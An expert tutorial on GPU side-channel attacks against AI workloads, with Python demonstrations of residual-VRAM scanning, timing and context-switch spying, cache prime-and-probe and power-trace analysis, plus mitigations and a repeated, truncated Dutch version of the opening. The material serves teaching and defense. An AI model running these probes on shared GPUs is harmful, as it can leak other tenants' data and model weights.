GPU memory side-channel attacks

Expert | 14 min read | Updated 2026-03-20

Side-channel attacks that exploit GPU memory allocation, timing, and electromagnetic emanation to extract sensitive data from AI workloads.

infrastructure gpu side-channel privacy hardware

Overview

GPUs are designed for parallel computation, not for multi-tenant security isolation. Unlike CPUs, which have seen decades of refinement in memory protection (virtual memory, page tables, protection rings), GPU memory management is fundamentally simpler. NVIDIA GPUs use a unified VRAM pool managed by the CUDA driver, and the isolation guarantees depend on the sharing mode (exclusive, time-sliced, MPS, or MIG).

This creates side-channel opportunities that do not exist in the same form on CPUs. When GPU memory is allocated and freed, the data stays in VRAM until it is overwritten. When multiple workloads share a GPU, timing differences in memory operations leak information about the other workloads. Even physical side channels, namely power consumption and electromagnetic emanation, carry information about the computations running on the GPU.

These side channels matter directly for AI security because AI workloads process sensitive data: model weights (intellectual property), inference inputs (user data, business queries), and training data (which may contain PII, medical records, or financial data). This article covers the known classes of GPU side-channel attacks, provides practical demonstration code, and evaluates the effectiveness of the available mitigations.

The attacks described here draw on research including Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (ACM CCS 2018), and Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020).

GPU memory architecture

VRAM management

NVIDIA GPUs manage VRAM through the CUDA driver, which allocates memory in blocks. Unlike CPU virtual memory, where the operating system hands out zeroed pages, GPU memory allocation is not zero-initialized by default in every context. The CUDA runtime's cudaMalloc does not guarantee that allocated memory is cleared, which means newly allocated buffers can contain data from earlier allocations.

import torch
from typing import Dict, List
 
class GPUMemoryResidualScanner:
    """
    Scan GPU memory for residual data from previous workloads.
    Demonstrates the GPU memory residual side channel.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
        if not torch.cuda.is_available():
            raise RuntimeError("CUDA is not available")
 
    def allocate_and_scan(
        self,
        size_mb: int = 256,
        num_blocks: int = 10,
    ) -> List[Dict]:
        """
        Allocate GPU memory blocks and check for non-zero residual data.
 
        This demonstrates that GPU memory may contain data from previous
        allocations by other processes on the same GPU.
        """
        findings = []
 
        for i in range(num_blocks):
            # Allocate without initialization
            num_elements = (size_mb * 1024 * 1024) // 4  # float32 = 4 bytes
            try:
                # Use empty (not zeros) to avoid initialization
                tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
                # Check for non-zero values (residual data)
                non_zero_count = torch.count_nonzero(tensor).item()
                non_zero_ratio = non_zero_count / num_elements
 
                # Statistical analysis of residual data
                if non_zero_count > 0:
                    non_zero_values = tensor[tensor != 0]
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": non_zero_count,
                        "non_zero_ratio": non_zero_ratio,
                        "sample_values": non_zero_values[:10].cpu().tolist(),
                        "min_value": non_zero_values.min().item(),
                        "max_value": non_zero_values.max().item(),
                        "finding": "RESIDUAL_DATA_FOUND",
                    })
                else:
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": 0,
                        "finding": "CLEAN",
                    })
 
                del tensor
                torch.cuda.empty_cache()
 
            except torch.cuda.OutOfMemoryError:
                findings.append({
                    "block": i,
                    "finding": "OOM — could not allocate",
                })
 
        return findings
 
    def scan_for_model_weights(
        self, size_mb: int = 512
    ) -> Dict:
        """
        Attempt to detect residual model weight patterns in GPU memory.
        Model weights typically follow specific statistical distributions
        (approximately normal for transformer layers).
        """
        num_elements = (size_mb * 1024 * 1024) // 4
        tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
        non_zero = tensor[tensor != 0]
        if len(non_zero) == 0:
            return {"found": False, "detail": "No residual data"}
 
        # Check if the distribution looks like model weights
        mean = non_zero.mean().item()
        std = non_zero.std().item()
        kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
 
        looks_like_weights = (
            abs(mean) < 0.5  # Weights are typically near zero
            and 0.001 < std < 1.0  # Reasonable weight scale
            and abs(kurtosis_val) < 10  # Not too heavy-tailed
        )
 
        del tensor
        torch.cuda.empty_cache()
 
        return {
            "found": looks_like_weights,
            "statistics": {
                "mean": mean,
                "std": std,
                "kurtosis": kurtosis_val,
                "sample_size": len(non_zero),
            },
            "interpretation": (
                "Residual data matches typical model weight distribution"
                if looks_like_weights
                else "Residual data does not match weight patterns"
            ),
        }
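
The weight-detection heuristic in scan_for_model_weights can be exercised without a GPU. The sketch below is a CPU-only restatement of the same three checks (mean near zero, plausible standard deviation, bounded excess kurtosis) on plain Python lists. The function name looks_like_weights and both synthetic inputs are illustrative assumptions, and it uses the population standard deviation where the scanner uses torch's sample standard deviation.

```python
import random
import statistics
from typing import Sequence


def looks_like_weights(values: Sequence[float]) -> bool:
    """CPU-only restatement of the thresholds used in scan_for_model_weights."""
    if len(values) < 2:
        return False
    mean = statistics.fmean(values)
    std = statistics.pstdev(values)
    if std == 0:
        return False  # constant data: kurtosis is undefined
    # Excess kurtosis: fourth central moment over variance squared, minus 3
    fourth_moment = statistics.fmean([(v - mean) ** 4 for v in values])
    kurtosis = fourth_moment / std ** 4 - 3
    return abs(mean) < 0.5 and 0.001 < std < 1.0 and abs(kurtosis) < 10


rng = random.Random(0)
# Synthetic stand-in for a trained layer: small Gaussian values (assumption)
gaussian_like = [rng.gauss(0.0, 0.02) for _ in range(10_000)]
# Synthetic stand-in for unrelated residual data: wide uniform values (assumption)
wide_uniform = [rng.uniform(-100.0, 100.0) for _ in range(10_000)]

print(looks_like_weights(gaussian_like))
print(looks_like_weights(wide_uniform))
```

The thresholds are loose, so a positive result is a hint that a buffer may hold weights, not proof.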

Memory allocation timing

The time needed to allocate GPU memory depends on the current memory state, which is influenced by other workloads. By measuring allocation timing, an attacker can infer information about co-resident workloads:

import torch
import time
from typing import Dict, List, Tuple  # Tuple is needed by measure_inference_timing
 
class GPUTimingSideChannel:
    """
    Demonstrate GPU memory timing side channels.
    Allocation and computation timing varies based on co-resident workloads.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def measure_allocation_timing(
        self,
        sizes_mb: List[int] = None,
        num_samples: int = 100,
    ) -> List[Dict]:
        """
        Measure GPU memory allocation timing at various sizes.
        Timing variations can reveal co-resident workload activity.
        """
        if sizes_mb is None:
            sizes_mb = [1, 10, 50, 100, 500]
 
        results = []
        for size_mb in sizes_mb:
            num_elements = (size_mb * 1024 * 1024) // 4
            timings = []
 
            for _ in range(num_samples):
                torch.cuda.synchronize()
                start = time.perf_counter_ns()
 
                try:
                    t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
                    torch.cuda.synchronize()
                    elapsed_ns = time.perf_counter_ns() - start
                    timings.append(elapsed_ns)
                    del t
                    torch.cuda.empty_cache()
                except torch.cuda.OutOfMemoryError:
                    break
 
            if timings:
                results.append({
                    "size_mb": size_mb,
                    "mean_ns": sum(timings) / len(timings),
                    "min_ns": min(timings),
                    "max_ns": max(timings),
                    "std_ns": (
                        sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                    ) ** 0.5,
                    "samples": len(timings),
                })
 
        return results
 
    def measure_inference_timing(
        self,
        model: torch.nn.Module,
        input_sizes: List[Tuple[int, ...]],
        num_samples: int = 50,
    ) -> List[Dict]:
        """
        Measure inference timing across different input sizes.
        Timing reveals information about model architecture.
        """
        model.eval()
        results = []
 
        for input_size in input_sizes:
            timings = []
 
            for _ in range(num_samples):
                x = torch.randn(*input_size, device=self.device)
 
                # Warm up
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
 
                # Measure
                start = time.perf_counter_ns()
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
                elapsed_ns = time.perf_counter_ns() - start
 
                timings.append(elapsed_ns)
                del x
 
            results.append({
                "input_size": input_size,
                "mean_us": sum(timings) / len(timings) / 1000,
                "std_us": (
                    sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                ) ** 0.5 / 1000,
                "samples": len(timings),
            })
 
        return results
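
Raw timing samples only become a signal once they are compared against a reference. One way to do that, sketched here under stated assumptions, is Welch's t-statistic between timings collected on a GPU believed to be idle and timings collected later. The helper names, the made-up sample values, and the threshold of 4.5 (a value often used in leakage-assessment practice) are assumptions for illustration, not part of the classes above.

```python
import math
import statistics
from typing import Sequence


def welch_t(baseline_ns: Sequence[float], observed_ns: Sequence[float]) -> float:
    """Welch's t-statistic for two independent samples with unequal variances."""
    mean_b = statistics.fmean(baseline_ns)
    mean_o = statistics.fmean(observed_ns)
    var_b = statistics.variance(baseline_ns)  # sample variance (n - 1)
    var_o = statistics.variance(observed_ns)
    standard_error = math.sqrt(var_b / len(baseline_ns) + var_o / len(observed_ns))
    if standard_error == 0:
        # No spread at all: either identical means or an infinitely clear shift
        return 0.0 if mean_b == mean_o else math.copysign(math.inf, mean_o - mean_b)
    return (mean_o - mean_b) / standard_error


def timing_shift_detected(
    baseline_ns: Sequence[float],
    observed_ns: Sequence[float],
    t_threshold: float = 4.5,  # hypothetical cut-off; tune per environment
) -> bool:
    """Flag a shift when |t| exceeds the chosen threshold."""
    return abs(welch_t(baseline_ns, observed_ns)) > t_threshold


# Made-up timings in nanoseconds, for illustration only
idle = [1000, 1010, 990, 1005, 995, 1002, 998, 1003]
busy = [1400, 1450, 1380, 1420, 1390, 1410, 1430, 1405]
print(timing_shift_detected(idle, busy))
print(timing_shift_detected(idle, idle))
```

A t-statistic accounts for the spread of both samples, which a comparison of means alone does not.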

Context-switching side channels

When multiple processes share a GPU through time-slicing (the default on consumer GPUs and many cloud instances), the GPU context-switches between processes. Each context switch causes measurable performance interference.

In "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020), Wei et al. showed that an attacker who runs a spy process that monitors its own performance during context switches can infer:

Whether a neural network is running on the shared GPU
The model architecture (number of layers, layer types)
Properties of the input data (image dimensions, batch size)

import torch
import time
from typing import Dict, List
 
class ContextSwitchSpy:
    """
    Monitor GPU context switching to infer co-resident workload properties.
    Based on concepts from Wei et al. (IEEE DSN 2020).
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def run_spy_kernel(
        self,
        duration_seconds: float = 5.0,
        probe_size: int = 1024,
    ) -> Dict:
        """
        Run a continuous probe kernel and measure timing variations.
        Timing spikes indicate GPU context switches to other workloads.
        """
        probe = torch.randn(probe_size, probe_size, device=self.device)
        measurements = []
        start_time = time.perf_counter()
 
        while time.perf_counter() - start_time < duration_seconds:
            torch.cuda.synchronize()
            op_start = time.perf_counter_ns()
 
            # Simple matrix multiply as timing probe
            result = torch.mm(probe, probe)
            torch.cuda.synchronize()
 
            op_end = time.perf_counter_ns()
            elapsed_ns = op_end - op_start
 
            measurements.append({
                "timestamp_ns": op_start,
                "duration_ns": elapsed_ns,
            })
 
            del result
 
        # Analyze timing variations
        durations = [m["duration_ns"] for m in measurements]
        mean_duration = sum(durations) / len(durations)
        threshold = mean_duration * 2  # Heuristic: treat >2x the mean as a context switch
 
        context_switches = [
            m for m in measurements if m["duration_ns"] > threshold
        ]
 
        return {
            "measurements": measurements,  # raw samples, usable by infer_layer_structure
            "total_probes": len(measurements),
            "mean_duration_ns": mean_duration,
            "context_switches_detected": len(context_switches),
            "switch_ratio": len(context_switches) / len(measurements) if measurements else 0,
            "interpretation": (
                "Co-resident GPU workload detected"
                if len(context_switches) > len(measurements) * 0.05
                else "No significant co-resident activity detected"
            ),
        }
 
    def infer_layer_structure(
        self,
        measurements: List[Dict],
        expected_layer_duration_us: float = 100,
    ) -> Dict:
        """
        Attempt to infer neural network layer structure from timing patterns.
        Different layer types (conv, attention, linear) have characteristic timing signatures.
        """
        # Group context switch gaps into clusters that may correspond to layers
        durations = [m["duration_ns"] for m in measurements]
        mean_d = sum(durations) / len(durations)
 
        # Find timing pattern periodicity
        anomalies = []
        for i, d in enumerate(durations):
            if d > mean_d * 1.5:
                anomalies.append(i)
 
        if len(anomalies) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
 
        # Calculate intervals between anomalies
        intervals = [
            anomalies[i+1] - anomalies[i]
            for i in range(len(anomalies) - 1)
        ]
 
        # Look for periodicity (suggesting repeated layer execution)
        if intervals:
            mean_interval = sum(intervals) / len(intervals)
            interval_std = (
                sum((i - mean_interval)**2 for i in intervals) / len(intervals)
            ) ** 0.5
 
            periodic = interval_std / mean_interval < 0.3 if mean_interval > 0 else False
 
            return {
                "inference_possible": True,
                "anomaly_count": len(anomalies),
                "mean_interval": mean_interval,
                "periodic": periodic,
                "estimated_layers": len(anomalies) if periodic else "unknown",
                "interpretation": (
                    f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
                    if periodic
                    else "Detected activity but could not determine layer structure"
                ),
            }
 
        return {"inference_possible": False, "reason": "No clear pattern"}
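
The spy above flags a probe as a context switch when it exceeds a multiple of the mean duration. Because the spikes themselves pull the mean upward, a busy co-tenant can raise the threshold and hide its own activity. A possible alternative, sketched here as an assumption and not taken from Wei et al., is a threshold built from the median and the median absolute deviation (MAD). The function name, the multiplier k, and the sample values are hypothetical.

```python
import statistics
from typing import List, Sequence


def robust_spike_indices(durations_ns: Sequence[float], k: float = 6.0) -> List[int]:
    """Return indices whose duration exceeds median + k * MAD."""
    median = statistics.median(durations_ns)
    mad = statistics.median([abs(d - median) for d in durations_ns])
    if mad == 0:
        # Degenerate case: at least half the samples equal the median
        return [i for i, d in enumerate(durations_ns) if d > median]
    threshold = median + k * mad
    return [i for i, d in enumerate(durations_ns) if d > threshold]


# Made-up probe durations in nanoseconds with two obvious spikes
samples = [100, 102, 98, 101, 99, 100, 950, 101, 97, 103, 900, 100]
print(robust_spike_indices(samples))
```

The returned indices can be fed into the same interval analysis that infer_layer_structure performs on its anomalies list.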

Cache-based side channels

GPU cache contention

Modern GPUs have L1 and L2 caches. In shared GPU environments, cache contention between workloads creates observable timing differences:

import torch
import time
from typing import Dict, List
 
class GPUCacheSideChannel:
    """
    Demonstrate GPU cache-based side channels.
    Cache contention from co-resident workloads causes measurable timing variations.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def prime_and_probe(
        self,
        array_size: int = 4 * 1024 * 1024,  # 4M elements ~= 16MB at float32
        num_rounds: int = 100,
    ) -> Dict:
        """
        GPU adaptation of Prime+Probe cache side channel.
 
        1. Prime: Fill GPU cache with known data
        2. Wait: Allow victim to execute (displacing some cache lines)
        3. Probe: Measure access time to our cached data
 
        Cache lines displaced by the victim will be slower to access.
        """
        # Create a large array that fills the L2 cache
        probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
        access_pattern = torch.randperm(array_size, device=self.device)[:1024]
 
        baseline_times = []
        probe_times = []
 
        for round_idx in range(num_rounds):
            # PRIME: Access all elements to fill cache
            torch.cuda.synchronize()
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # PROBE (baseline — no victim activity between prime and probe)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            baseline_time = time.perf_counter_ns() - start
            baseline_times.append(baseline_time)
 
            # PRIME again
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # Small delay to allow potential co-resident activity
            time.sleep(0.001)
 
            # PROBE again (after potential victim activity)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            probe_time = time.perf_counter_ns() - start
            probe_times.append(probe_time)
 
        mean_baseline = sum(baseline_times) / len(baseline_times)
        mean_probe = sum(probe_times) / len(probe_times)
 
        return {
            "rounds": num_rounds,
            "mean_baseline_ns": mean_baseline,
            "mean_probe_ns": mean_probe,
            "timing_difference_ns": mean_probe - mean_baseline,
            "cache_contention_detected": mean_probe > mean_baseline * 1.2,
            "contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
        }
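
prime_and_probe compares the mean baseline time with the mean probe time, so a handful of very slow rounds can dominate the result. Since each round yields one baseline and one probe measurement, the rounds can also be treated as pairs. The sketch below applies a one-sided sign test to such pairs; it assumes the per-round lists are available (the method above only returns their means), and the function name and sample values are hypothetical.

```python
import math
from typing import Sequence


def sign_test_p_value(baseline_ns: Sequence[float], probe_ns: Sequence[float]) -> float:
    """One-sided sign test on paired rounds.

    Returns the probability of seeing at least this many rounds where the
    probe was slower than the baseline, if slower and faster were equally likely.
    """
    pairs = [(b, p) for b, p in zip(baseline_ns, probe_ns) if b != p]  # drop ties
    n = len(pairs)
    if n == 0:
        return 1.0
    slower = sum(1 for b, p in pairs if p > b)
    # Binomial tail P(X >= slower) for X ~ Binomial(n, 0.5)
    tail = sum(math.comb(n, k) for k in range(slower, n + 1))
    return tail / 2 ** n


# Made-up per-round timings in nanoseconds, for illustration only
baseline = [100, 101, 99, 100, 102, 98, 100, 101, 99, 100]
probe = [130, 128, 135, 99, 140, 131, 129, 133, 138, 127]
print(sign_test_p_value(baseline, probe))
```

A small p-value suggests that something between prime and probe consistently slows the probe. It does not say what: the sleep between the two steps can also change timing on its own, so an idle-GPU control run is still needed.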

Power and electromagnetic side channels

GPU power consumption correlates with computational activity. Research has shown that power traces can reveal:

Whether the GPU is performing matrix multiplication (training/inference) or memory operations
The size of the matrices being computed
Possibly the values being processed (in extreme cases, with high-resolution measurements)

These attacks require physical access to power measurement points or electromagnetic probes near the GPU, which makes them most relevant for:

Shared physical infrastructure (colocation data centers)
Edge AI devices to which an attacker has physical access
Supply-chain attacks in which monitoring hardware has been implanted

from typing import Dict, List, Optional
from dataclasses import dataclass
 
@dataclass
class PowerMeasurement:
    """Simulated GPU power measurement data point."""
    timestamp_us: float
    power_watts: float
    gpu_utilization_pct: float
 
class PowerSideChannelAnalyzer:
    """
    Analyze GPU power consumption traces for information leakage.
 
    In practice, power measurements come from:
    - nvidia-smi (low resolution, ~1 second)
    - NVML API (higher resolution, ~100ms)
    - External power meters (highest resolution)
    """
 
    def analyze_power_trace(
        self,
        measurements: List[PowerMeasurement],
    ) -> Dict:
        """Analyze a power consumption trace for patterns."""
        if not measurements:
            return {"analysis": "no_data"}
 
        powers = [m.power_watts for m in measurements]
        timestamps = [m.timestamp_us for m in measurements]
 
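        # Detect computation phases
        mean_power = sum(powers) / len(powers)
        idle_threshold = mean_power * 0.8  # one threshold for every sample, including the first
        phases = []
        current_phase = "idle" if powers[0] < idle_threshold else "active"
        phase_start = 0

        for i in range(1, len(powers)):
            new_phase = "idle" if powers[i] < idle_threshold else "active"
            if new_phase != current_phase:
                phases.append({
                    "type": current_phase,
                    "start_idx": phase_start,
                    "end_idx": i,
                    "duration_us": timestamps[i] - timestamps[phase_start],
                    "mean_power": sum(powers[phase_start:i]) / (i - phase_start),
                })
                current_phase = new_phase
                phase_start = i

        # Close the final phase, which the loop above never appends
        phases.append({
            "type": current_phase,
            "start_idx": phase_start,
            "end_idx": len(powers),
            "duration_us": timestamps[-1] - timestamps[phase_start],
            "mean_power": sum(powers[phase_start:]) / (len(powers) - phase_start),
        })

        active_phases = [p for p in phases if p["type"] == "active"]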
 
        return {
            "total_measurements": len(measurements),
            "mean_power_watts": mean_power,
            "max_power_watts": max(powers),
            "min_power_watts": min(powers),
            "computation_phases": len(active_phases),
            "phase_details": active_phases[:10],
            "interpretation": (
                f"Detected {len(active_phases)} computation phases — "
                "may correspond to model layers or inference batches"
            ),
        }
 
    def detect_model_architecture_from_power(
        self, phases: List[Dict]
    ) -> Dict:
        """
        Attempt to infer model architecture from power consumption patterns.
        Different layer types have characteristic power signatures.
        """
        if len(phases) < 3:
            return {"inference_possible": False}
 
        # Attention layers: high power, longer duration
        # Linear layers: moderate power, shorter duration
        # Normalization: low power, very short duration
        layer_classifications = []
        for phase in phases:
            power = phase.get("mean_power", 0)
            duration = phase.get("duration_us", 0)
 
            if power > 250 and duration > 1000:
                layer_classifications.append("attention_or_matmul")
            elif power > 150 and duration > 500:
                layer_classifications.append("linear")
            elif duration < 200:
                layer_classifications.append("normalization_or_activation")
            else:
                layer_classifications.append("unknown")
 
        return {
            "inference_possible": True,
            "estimated_layers": len(layer_classifications),
            "layer_types": layer_classifications,
            "attention_layers": layer_classifications.count("attention_or_matmul"),
            "linear_layers": layer_classifications.count("linear"),
        }
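
analyze_power_trace splits the trace with a single threshold, so a sample that briefly dips below it in the middle of a long kernel starts a new phase. A common remedy is hysteresis: use a higher threshold to enter the active state and a lower one to leave it. The sketch below illustrates this on a made-up trace; the function name, both threshold parameters, and the wattage values are assumptions for illustration.

```python
from typing import List, Tuple


def segment_with_hysteresis(
    powers_watts: List[float],
    enter_active_watts: float,
    exit_active_watts: float,
) -> List[Tuple[str, int, int]]:
    """Split a power trace into (phase, start_idx, end_idx) runs; end_idx is exclusive.

    The state switches idle -> active only above enter_active_watts and
    active -> idle only below exit_active_watts, so samples between the two
    thresholds never create a new phase.
    """
    if not powers_watts:
        return []
    if exit_active_watts > enter_active_watts:
        raise ValueError("exit threshold must not exceed enter threshold")
    state = "active" if powers_watts[0] >= enter_active_watts else "idle"
    start = 0
    phases: List[Tuple[str, int, int]] = []
    for i in range(1, len(powers_watts)):
        power = powers_watts[i]
        if state == "idle" and power > enter_active_watts:
            new_state = "active"
        elif state == "active" and power < exit_active_watts:
            new_state = "idle"
        else:
            new_state = state
        if new_state != state:
            phases.append((state, start, i))
            state, start = new_state, i
    phases.append((state, start, len(powers_watts)))  # close the final run
    return phases


# Made-up trace in watts: two bursts, the first with dips to 180 W and 170 W
trace = [60, 62, 210, 180, 205, 170, 58, 61, 220, 215, 59]
print(segment_with_hysteresis(trace, enter_active_watts=200, exit_active_watts=100))
```

With a single threshold near 190 W, the first burst in this trace would be split into several short phases; with hysteresis it stays one phase.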

Mitigations

Software mitigations

import random
import time  # used by add_timing_noise and constant_time_inference
import torch
 
class GPUSideChannelMitigation:
    """Software mitigations for GPU side-channel attacks."""
 
    @staticmethod
    def secure_allocate(
        size: tuple,
        dtype: torch.dtype = torch.float32,
        device: str = "cuda:0",
    ) -> torch.Tensor:
        """Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
        tensor = torch.zeros(size, dtype=dtype, device=torch.device(device))
        return tensor
 
    @staticmethod
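    def secure_deallocate(tensor: torch.Tensor) -> None:
        """
        Overwrite a tensor with zeros before it is freed.

        Note: `del tensor` below only drops this function's local reference.
        The caller must drop its own references as well before the memory
        can actually be released.
        """
        if tensor.is_cuda:
            tensor.zero_()
            torch.cuda.synchronize()
        del tensor
        torch.cuda.empty_cache()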
 
    @staticmethod
    def add_timing_noise(
        min_delay_ms: float = 0.1,
        max_delay_ms: float = 1.0,
    ) -> None:
        """
        Add random timing noise to inference operations.
        Makes timing side channels less reliable.
        """
        import random
        delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
        time.sleep(delay)
 
    @staticmethod
    def constant_time_inference(
        model: torch.nn.Module,
        input_tensor: torch.Tensor,
        fixed_duration_ms: float = 100,
    ) -> torch.Tensor:
        """
        Execute inference and pad to a fixed duration.
        Hides timing differences only for inferences that finish within
        fixed_duration_ms; slower inferences are not padded and still leak.
        """
        start = time.perf_counter()
 
        with torch.no_grad():
            output = model(input_tensor)
        torch.cuda.synchronize()
 
        elapsed_ms = (time.perf_counter() - start) * 1000
        remaining_ms = fixed_duration_ms - elapsed_ms
        if remaining_ms > 0:
            time.sleep(remaining_ms / 1000)
 
        return output
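
constant_time_inference pads only when the inference finishes before the fixed deadline, so anything slower is returned unpadded. One way to narrow that gap, sketched here as an assumption and not as a complete defense, is to round every duration up to the next multiple of a bucket size. The function names and the injectable clock and sleep parameters are hypothetical; they exist so the padding logic can be checked without a GPU. For GPU work, the work callable would need to include the model call and torch.cuda.synchronize().

```python
import math
import time
from typing import Callable, Tuple, TypeVar

T = TypeVar("T")


def padded_duration_ms(elapsed_ms: float, bucket_ms: float) -> float:
    """Round elapsed time up to the next multiple of bucket_ms (at least one bucket)."""
    if bucket_ms <= 0:
        raise ValueError("bucket_ms must be positive")
    buckets = max(1, math.ceil(elapsed_ms / bucket_ms))
    return buckets * bucket_ms


def run_padded(
    work: Callable[[], T],
    bucket_ms: float = 100.0,
    clock: Callable[[], float] = time.perf_counter,
    sleep: Callable[[float], None] = time.sleep,
) -> Tuple[T, float]:
    """Run work(), then sleep until the next bucket boundary.

    Returns (result, target_ms), where target_ms is the padded duration.
    """
    start = clock()
    result = work()
    elapsed_ms = (clock() - start) * 1000
    target_ms = padded_duration_ms(elapsed_ms, bucket_ms)
    remaining_ms = target_ms - elapsed_ms
    if remaining_ms > 0:
        sleep(remaining_ms / 1000)
    return result, target_ms


# CPU-only usage example with a trivial stand-in workload
result, target = run_padded(lambda: sum(range(1000)), bucket_ms=5.0)
print(result, target)
```

An observer still learns which bucket a request fell into, so the bucket size trades leakage against added latency.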

Hardware mitigations

Mitigation	Effectiveness	Performance impact	Availability
MIG (Multi-Instance GPU)	High: hardware isolation	Reduces compute per instance	A100, H100
NVIDIA Confidential Computing	Very high: encrypted GPU memory	5-15% overhead	H100
GPU memory scrubbing	Medium: removes residual data	Adds allocation latency	Software-configurable
Dedicated GPU per workload	Complete: no sharing	Expensive	Any GPU
IOMMU	Medium: prevents DMA attacks	Minimal	Depends on CPU/chipset

Defensive recommendations

Use MIG in multi-tenant GPU environments to get hardware-enforced memory isolation
Zero-initialize GPU memory on allocation to prevent residual data leakage
Overwrite GPU memory with zeros before freeing sensitive tensors
Use NVIDIA Confidential Computing (H100) for sensitive inference workloads
Avoid GPU time-slicing for security-sensitive workloads; use dedicated GPUs or MIG instances instead
Add timing noise to inference operations to make timing side channels less reliable
Monitor GPU power consumption for anomalous patterns that may indicate a side-channel attack
Enable the IOMMU to prevent DMA-based memory access from compromised GPU workloads

References

Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (ACM CCS 2018): foundational GPU side-channel research
Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020): model architecture inference from context switching
Zhu et al., "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021): model extraction via GPU side channels
NVIDIA Multi-Instance GPU: https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
NVIDIA Confidential Computing: https://developer.nvidia.com/confidential-computing
MITRE ATLAS: AML.T0024 (Exfiltration via ML Inference API)

GPU-geheugen side-channelaanvallen

Expert14 min lezenBijgewerkt op 2026-03-20

Side-channelaanvallen die GPU-geheugentoewijzing, timing en elektromagnetische emanatie uitbuiten om gevoelige data te onttrekken aan AI-workloads.

infrastructure gpu side-channel privacy hardware

Overzicht

GPU-geheugenarchitectuur

VRAM-beheer

import torch
import numpy as np
from typing import Dict, List, Optional, Tuple
 
class GPUMemoryResidualScanner:
    """
    Scan GPU memory for residual data from previous workloads.
    Demonstrates the GPU memory residual side channel.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
        if not torch.cuda.is_available():
            raise RuntimeError("CUDA is not available")
 
    def allocate_and_scan(
        self,
        size_mb: int = 256,
        num_blocks: int = 10,
    ) -> List[Dict]:
        """
        Allocate GPU memory blocks and check for non-zero residual data.
 
        This demonstrates that GPU memory may contain data from previous
        allocations by other processes on the same GPU.
        """
        findings = []
 
        for i in range(num_blocks):
            # Allocate without initialization
            num_elements = (size_mb * 1024 * 1024) // 4  # float32 = 4 bytes
            try:
                # Use empty (not zeros) to avoid initialization
                tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
                # Check for non-zero values (residual data)
                non_zero_count = torch.count_nonzero(tensor).item()
                non_zero_ratio = non_zero_count / num_elements
 
                # Statistical analysis of residual data
                if non_zero_count > 0:
                    non_zero_values = tensor[tensor != 0]
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": non_zero_count,
                        "non_zero_ratio": non_zero_ratio,
                        "sample_values": non_zero_values[:10].cpu().tolist(),
                        "min_value": non_zero_values.min().item(),
                        "max_value": non_zero_values.max().item(),
                        "finding": "RESIDUAL_DATA_FOUND",
                    })
                else:
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": 0,
                        "finding": "CLEAN",
                    })
 
                del tensor
                torch.cuda.empty_cache()
 
            except torch.cuda.OutOfMemoryError:
                findings.append({
                    "block": i,
                    "finding": "OOM — could not allocate",
                })
 
        return findings
 
    def scan_for_model_weights(
        self, size_mb: int = 512
    ) -> Dict:
        """
        Attempt to detect residual model weight patterns in GPU memory.
        Model weights typically follow specific statistical distributions
        (approximately normal for transformer layers).
        """
        num_elements = (size_mb * 1024 * 1024) // 4
        tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
        non_zero = tensor[tensor != 0]
        if len(non_zero) == 0:
            return {"found": False, "detail": "No residual data"}
 
        # Check if the distribution looks like model weights
        mean = non_zero.mean().item()
        std = non_zero.std().item()
        kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
 
        looks_like_weights = (
            abs(mean) < 0.5  # Weights are typically near zero
            and 0.001 < std < 1.0  # Reasonable weight scale
            and abs(kurtosis_val) < 10  # Not too heavy-tailed
        )
 
        del tensor
        torch.cuda.empty_cache()
 
        return {
            "found": looks_like_weights,
            "statistics": {
                "mean": mean,
                "std": std,
                "kurtosis": kurtosis_val,
                "sample_size": len(non_zero),
            },
            "interpretation": (
                "Residual data matches typical model weight distribution"
                if looks_like_weights
                else "Residual data does not match weight patterns"
            ),
        }

Geheugentoewijzingstiming

import torch
import time
from typing import List, Dict
 
class GPUTimingSideChannel:
    """
    Demonstrate GPU memory timing side channels.
    Allocation and computation timing varies based on co-resident workloads.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def measure_allocation_timing(
        self,
        sizes_mb: List[int] = None,
        num_samples: int = 100,
    ) -> List[Dict]:
        """
        Measure GPU memory allocation timing at various sizes.
